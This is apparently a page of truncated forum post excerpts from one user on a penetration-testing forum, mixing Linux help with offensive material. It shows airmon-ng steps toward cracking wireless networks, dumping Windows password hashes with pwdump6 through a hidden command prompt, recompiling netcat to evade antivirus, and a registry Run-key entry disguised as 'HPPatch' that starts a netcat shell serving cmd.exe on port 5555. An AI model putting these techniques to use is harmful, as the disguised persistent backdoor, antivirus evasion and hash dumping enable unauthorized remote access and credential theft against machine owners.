I'm in the process of writing a research paper I'd like to eventually publish and I was wondering if anyone could explain the math to me behind shared key authentication. I think I need some...

Perhaps you shouldn't be trying to crack a router that isn't yours.

Honestly, any question you could possibly want to know about Linux is most likely answered here: LinuxQuestions.org. Do everyone a favor and start searching for answers instead of making a new thread...

Sometimes you have to help them out a little bit more than that.

@voochee here you go:

metasploit add exploit

Assuming this is a pen drive, according to the above, your USB is already mounted properly. To access the files on it you can use a GUI browser like Konqueror and navigate to "media" or to...

This could be a number of things:

You're on a different channel than the AP
MAC address filtering could be enabled on the router
Sometimes this attack fails on some aps if this is the case...

Make a directory to mount the drive to:


sudo mkdir /mnt/sdb1

Mount the USB drive:


mount /dev/sdb1 /mnt/sdb1
note: you may have to substitue b for c or d etc.

So to summarize using your steps:

This command puts the device in monitor mode so we can monitor incoming IVs:


airmon-ng start [device]

To find the networt name and BSSID (router mac...

My apologies, I must be getting old.. I meant pwdump6 :D

Which payload are you using? Can you post all the commands you're using in msfconsole?

Start with airmon-ng. This will display both wireless adapters and their subsequent chipsets, from here you should be able to see which one is the rosewill. Set that one to monitor:


airmon-ng...

That document mentions nothing about a BT4 dual boot installation, why would you use it for anything but what it says in the first couple of lines: "The assumption is that you are installing BT4 on...

This is also doable with PDF files, I remember reading an article on securinfos.infos a while back about how to do it.

The easiest way for me to accomplish this was to upload pwdump6 which has provisions for Vista both 32 and 64-bit hash dumping. Then open a hidden command prompt and dump the hashes to a file and...

What's there to elaborate on? He's saying people will not understand the contents of the BT3 and boot folders.

What about porting the tools over to say a google phone?

I was curious if anyone had a list of antivirus file / process names or knew where I could find them. I've googled all over the net and the closet I've come was a thread on governmentsecurity.com but...

This was the method I used as well, it got it by Norton. However, be aware that different AV use different virus signatures, what works on one AV might not on another. To totally evade AV detection...

Good to see someone in a similar situation, I tried using VC++ 2008 as well. I also tried, cygwin and minGW but to no avail, all would compile correctly but the -L issue still occured. I have an...

The -L flag is supposed to allow listening after someone connects and disconnects, and it works properly on the exe delivered in the folder already. Now when I try to compile it myself, it forcefully...

So I'm attempting to recompile netcat from it's windows ported source to by pass antivirus signatures. The compile goes well and exits with no warnings however whenever I try to invoke the nc -L...

Well after some trial and error I figured out what issue with the registry, it seems that I forgot to allow the program through the firewall first before I tried to insert the registry key, go figure.

Great, I was able to turn it off locally like you said. So I booted up my XP box to see if the registry file was just a Vista thing and it didn't work on XP either, so something is wrong. I've tried...

Hah, thanks. Also, the user is an Administrator so I don't understand why it wouldn't let me write to it. It didn't give me an error and when I had the registry opened it looked like it refreshed but...

This was what I eventually went with:


REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"HPPatch"="C:\Windows\system32\inetpub\nc.exe -l -L -p 5555 -d -t -e cmd.exe"...